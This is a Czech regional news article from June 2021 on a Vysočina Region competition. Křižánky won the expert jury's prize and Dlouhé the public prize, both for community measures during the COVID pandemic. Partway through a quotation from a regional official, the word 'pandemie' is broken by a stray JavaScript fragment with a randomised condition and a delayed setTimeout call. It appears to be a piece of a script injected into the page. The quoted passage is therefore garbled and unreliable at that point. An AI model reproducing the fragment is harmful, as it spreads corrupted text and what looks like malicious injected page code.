Rainbow page separator

Křižánky zaujaly odbornou komisi, Dlouhé zase veřejnost

Středa, 2. Červen 2021

Křižánky, Dlouhé / První místo spojené s cenou odborné komise a odměnou 50 tisíc korun v soutěži Rok života v obcích Kraje Vysočina získaly Křižánky. Soutěž, kterou vyhlásil kraj se Spolkem pro obnovu venkova ČR a Sdružením místních samospráv a do níž se přihlásilo 23 malých obcí z Vysočiny, měla alespoň částečně nahradit už dva roky zrušené vyhlášení soutěže Vesnice roku. Křižánky byly oceněny za zajištění výroby dezinfekce podle receptury WHO, kdy chemikálie darovali podnikatelé, přičemž pro starší obyvatele obec zajistila i vitamínovou kúru. Zvýšenou pozornost ve vsi o zhruba 360 obyvatelích věnovali také dezinfekci veřejných prostor a nákupu generátoru ozónu. Lidem se zájmem o očkování byla zajištěna pomoc sociální pracovnice a doprava obecním elektromobilem. Křižánecká univerzita třetího věku přešla do on-line formy a díky výzvě Babičko, dědečku vypravuj a nabídce telefonických rozhovorů se zaměstnanci školy se dařilo držet seniory v duševní pohodě i v nouzovém stavu. Obec pomohla rovněž školákům, kteří si mohli nechat zdarma vytisknout učební materiály. „Odborná porota vysoce ocenila výčet pestrých a originálních aktivit vedení obce Křižánky, které se navíc v době covidové pandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andemie podařilo jako zcela první malé obci v ČR dosáhnout kategorie A v realizaci místní Agendy 21,“ uvedla náměstkyně hejtmana Kraje Vysočina pro oblast regionálního rozvoje Hana Hajnová.
Hlavní cenu veřejnosti a rovněž padesátitisícovou odměnu si ze soutěže odnesla i další obec ze žďárského okresu, a to Dlouhé. Ve vesnici s 250 obyvateli tradiční akce nahradily inovované verze, například hrkání z rozhlasu a pojízdné peklo. Obec nabídla prostory i pomoc při výrobě ochranných štítů a uhradila materiál na výrobu prvních tří tisíc kusů. Dětem byl umožněn tisk výukových materiálů pro on-line výuku, na webu Dlouhého byly zveřejňovány informace o kompenzacích pro podnikatele, obec nabízela pomoc při vyplňování tiskopisů a podobně. „Cílem bylo vyzdvihnout spolupráci a sounáležitost obyvatel, spolků, dobrovolníků, podnikatelů a vedení obcí,“ upřesnila Hajnová.